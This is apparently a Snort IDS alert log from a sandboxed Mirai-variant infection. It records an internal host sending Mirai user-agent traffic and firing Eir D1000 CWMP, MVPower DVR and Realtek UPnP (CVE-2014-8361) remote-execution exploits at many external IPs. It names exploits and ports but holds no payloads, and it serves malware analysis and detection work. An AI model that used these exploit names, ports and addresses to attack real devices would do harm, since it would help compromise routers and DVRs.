Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:38650 -> 112.151.46.206:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:37346 -> 85.98.193.167:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:33180 -> 188.54.239.116:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:58914 -> 220.72.135.183:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:45856 -> 27.233.52.162:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:58922 -> 220.72.135.183:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:35084 -> 84.232.231.38:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:46436 -> 84.241.15.20:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:46404 -> 164.90.130.155:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:45864 -> 27.233.52.162:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:33462 -> 2.39.210.167:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:46450 -> 84.241.15.20:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:59554 -> 115.10.72.87:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:34268 -> 85.95.237.116:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:50846 -> 46.196.20.94:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51338 -> 175.215.75.199:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51350 -> 175.215.75.199:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:53270 -> 187.65.39.100:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39452 -> 60.246.142.245:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:38788 -> 95.6.17.154:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:53280 -> 187.65.39.100:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:36364 -> 2.21.22.26:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39462 -> 60.246.142.245:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:50854 -> 46.196.20.94:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:33188 -> 188.54.239.116:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:35462 -> 186.6.173.41:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:34586 -> 88.22.101.243:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:33356 -> 51.211.68.234:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39898 -> 175.245.68.240:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39402 -> 211.185.93.192:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:39752 -> 88.221.197.20:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:45886 -> 89.117.61.64:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:33370 -> 51.211.68.234:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39420 -> 211.185.93.192:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:45868 -> 89.117.61.64:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:57606 -> 89.181.212.73:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:35476 -> 186.6.173.41:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39916 -> 175.245.68.240:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:49554 -> 204.210.177.74:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:52804 -> 88.87.11.92:80 |
Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.13:37200 -> 195.164.210.234:52869 |
Source: Traffic | Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.13:37200 -> 195.164.210.234:52869 |
Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.13:48700 -> 195.164.153.68:52869 |
Source: Traffic | Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.13:48700 -> 195.164.153.68:52869 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:49558 -> 204.210.177.74:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:41504 -> 186.60.4.249:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:35088 -> 95.86.95.36:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:35574 -> 14.46.120.99:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:33106 -> 88.198.131.170:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:38510 -> 88.159.63.224:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:35592 -> 14.46.120.99:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:33318 -> 46.141.120.179:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:40194 -> 46.149.134.189:80 |
Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.13:37220 -> 195.164.210.234:52869 |
Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.13:48720 -> 195.164.153.68:52869 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:57286 -> 94.99.40.187:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:46820 -> 121.144.168.216:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:50692 -> 182.53.0.16:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:41628 -> 34.36.185.205:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:42702 -> 87.196.197.223:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39058 -> 37.234.188.247:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:41632 -> 34.36.185.205:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:42806 -> 87.196.197.223:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:50798 -> 182.53.0.16:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39162 -> 37.234.188.247:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:50218 -> 46.148.235.25:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:50818 -> 80.73.131.70:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:54774 -> 80.77.112.171:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:33992 -> 80.153.152.89:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:57338 -> 94.99.40.187:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:60072 -> 46.44.154.129:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:57082 -> 46.253.192.197:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:54784 -> 80.77.112.171:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:47230 -> 46.28.3.107:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:37748 -> 46.242.248.88:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:57380 -> 94.99.40.187:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:46914 -> 121.144.168.216:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:50286 -> 47.160.15.35:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39156 -> 196.234.225.76:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:50296 -> 47.160.15.35:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39018 -> 121.176.65.14:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:41694 -> 186.60.4.249:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39028 -> 121.176.65.14:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:38616 -> 88.159.63.224:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:57420 -> 94.99.40.187:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:33746 -> 177.191.160.6:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:45806 -> 183.105.64.62:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:33752 -> 177.191.160.6:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:45812 -> 183.105.64.62:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39166 -> 196.234.225.76:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:40452 -> 203.206.7.99:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:32978 -> 88.86.113.47:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:40458 -> 203.206.7.99:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:56246 -> 185.58.229.138:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:36838 -> 85.148.115.120:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:32982 -> 88.86.113.47:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:34492 -> 86.141.22.25:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:41190 -> 220.240.161.184:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:56258 -> 185.58.229.138:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:34508 -> 86.141.22.25:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:33482 -> 95.214.53.70:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:41594 -> 95.217.236.9:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:57974 -> 112.160.90.116:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:33788 -> 177.191.160.6:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:45966 -> 95.183.13.226:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:49634 -> 112.15.29.162:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:41210 -> 220.240.161.184:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:33804 -> 177.191.160.6:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:36854 -> 85.148.115.120:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:50802 -> 122.252.136.56:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:49928 -> 188.50.159.184:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:46822 -> 119.214.64.56:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:41704 -> 186.60.4.249:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:46828 -> 119.214.64.56:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:45354 -> 118.57.53.150:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:56170 -> 14.72.33.147:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:60326 -> 14.65.141.102:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:56186 -> 14.72.33.147:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:45366 -> 118.57.53.150:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:60346 -> 14.65.141.102:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:42146 -> 95.101.97.96:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:32920 -> 95.213.249.140:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:54844 -> 95.58.237.119:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:58380 -> 88.221.17.131:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:57004 -> 189.110.180.123:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:49932 -> 188.50.159.184:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:49460 -> 99.237.233.217:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:57388 -> 47.181.186.122:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:49468 -> 99.237.233.217:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:57396 -> 47.181.186.122:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:56944 -> 175.227.238.191:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:56950 -> 175.227.238.191:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:42826 -> 24.94.90.145:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:45094 -> 179.126.120.154:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:42866 -> 24.94.90.145:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:57032 -> 189.110.180.123:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:45134 -> 179.126.120.154:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:53036 -> 24.168.207.62:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:53042 -> 24.168.207.62:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:42824 -> 150.249.91.218:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:42828 -> 150.249.91.218:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:35588 -> 195.191.25.30:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:59268 -> 195.57.99.215:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:34462 -> 85.10.135.68:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:59542 -> 112.185.128.109:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:59048 -> 164.132.13.241:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:51452 -> 88.150.248.134:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:60436 -> 80.232.250.253:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:47076 -> 80.179.128.169:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:42408 -> 164.42.197.26:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:42460 -> 164.42.197.26:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:42172 -> 112.139.137.231:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:49306 -> 118.49.36.45:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:57070 -> 189.110.180.123:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:33688 -> 95.76.116.165:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:52142 -> 95.179.194.62:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:56060 -> 95.217.108.14:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:51052 -> 95.0.170.148:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:49312 -> 118.49.36.45:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:57218 -> 189.110.180.123:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:60500 -> 61.108.102.56:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:50704 -> 188.114.98.34:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:51424 -> 188.66.24.2:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:50472 -> 188.166.56.123:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:46178 -> 188.114.229.151:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:34290 -> 95.100.206.108:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51172 -> 197.27.0.149:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:60666 -> 95.57.251.169:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:37374 -> 190.80.211.76:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:58948 -> 97.120.77.17:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51288 -> 197.27.0.149:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:46676 -> 177.106.167.116:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:36814 -> 95.151.180.27:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:37386 -> 190.80.211.76:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:58960 -> 97.120.77.17:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:48496 -> 119.203.230.104:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:46692 -> 177.106.167.116:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:48520 -> 119.203.230.104:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:44324 -> 95.154.199.188:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:49662 -> 95.140.132.85:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:50730 -> 95.217.210.172:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:55302 -> 95.216.105.97:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:48340 -> 95.174.6.60:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:40332 -> 88.85.219.152:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:35902 -> 188.29.240.148:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:53800 -> 95.179.200.40:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:40412 -> 88.85.219.152:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:46742 -> 177.106.167.116:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:42982 -> 95.101.97.159:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:36208 -> 95.12.211.158:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:46756 -> 177.106.167.116:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51022 -> 191.254.179.114:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:48276 -> 188.128.207.45:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:49814 -> 164.92.230.102:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:54000 -> 86.181.249.205:7547 |
